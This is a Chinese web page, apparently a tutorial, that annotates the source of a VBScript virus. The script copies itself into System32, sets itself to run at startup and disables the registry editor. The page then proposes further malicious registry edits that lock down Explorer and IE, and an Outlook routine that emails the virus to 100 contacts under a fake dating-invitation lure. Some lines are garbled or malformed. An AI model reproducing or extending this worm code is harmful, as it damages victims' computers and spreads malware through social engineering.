1、 代码分析:
On Error Resume Next '如果发生错误,不弹出窗口,继续执行下面语句
Set fs=CreateObject("Scripting.FileSystemObject") '创建一个能与操作系统沟通的对象,再利用该对象的各种方法对注册表进行操作
Set dir1=fs.GetSpecialFolder(0) '获取%Windows%文件夹位置
Set dir2=fs.GetSpecialFolder(1) '获取System32/System文件夹位置
Set so=CreateObject("Scripting.FileSystemObject")
dim r '定义一个变量
Set r=CreateObject("Wscript.Shell") '声明
so.GetFile(WScript.ScriptFullName).Copy(dir2&"\Win32system.vbs") '复制病毒副本到System32/System文件夹位置
'下面是对注册表的恶意修改
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",1,"REG_DWORD" '修改注册表,禁止注册表编辑
r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Win32system","Win32system.vbs" '修改注册表,使这个脚本本身开机自动运行
r.Regwrite "HKLM\Software\CLASSES\.reg\","txtfile" '修改注册表,禁止导入使用.reg文件,改为用txt文件的关联
通过上面分析,我们还可以对该恶意代码加入更多的功能,如对于修改注册表来说,可以有:
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun",1,"REG_DWORD"
'修改注册表,禁止“运行”菜单
r.Regwrite "KCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose",1,"REG_DWORD" '修改注册表,禁止“关闭”菜单
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives",63000000,"REG_DWORD" '修改注册表,隐藏所有逻辑盘符
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetTaskBar",1,"REG_DWORD" '修改注册表,禁止“任务栏和开始”菜单
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu",1,"REG_DWORD" '修改注册表,禁止右键菜单
internet explorer 脚本错误r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders",1,"REG_DWORD" '修改注册表,禁止控制面板
还可以对IE选项进行恶意修改:
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserContextMenu",1,"REG_DWORD" '修改注册表,禁止鼠标右键
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserOptions",1,"REG_DWORD" '修改注册表,禁止Internet选项
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoFileOpen",1,"REG_DWORD" '修改注册表,禁止“文件/打开”菜单
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\Advanced",1,
"REG_DWORD" '修改注册表,禁止更改高级页设置
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage",1,"REG_DWORD" '修改注册表,禁止更改主页,即“主页”变灰
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\SecurityTab",1,"REG_DWORD" '修改注册表,禁止更改安全项
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoViewSource",1,"REG_DWORD" '修改注册表,禁止查看源文件
……
还可以加入通过邮件自动传播功能:
Set ol=CreateObject("Outlook.Application") '创建Outlook文件对象用于传播
On Error Resume Next
For x=1 To 100
Set Mail=ol.CreateItem(0)
=ol.GetNameSpace("MAPI").AddressLists(1).AddressEntries(x) '用于向地址簿的前100名发送此VBS病毒
Mail.Subject="今晚你来吗?" '邮件主题
Mail.Body="朋友你好:您的朋友Rose给您发来了热情的邀请。具体情况请阅读随信附件,祝您好运! 同城约会网" '邮件内容
Mail.Attachments.Add(dir2&"Win32system.vbs")
Mail.Send
Next
ol.Quit
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。
发表评论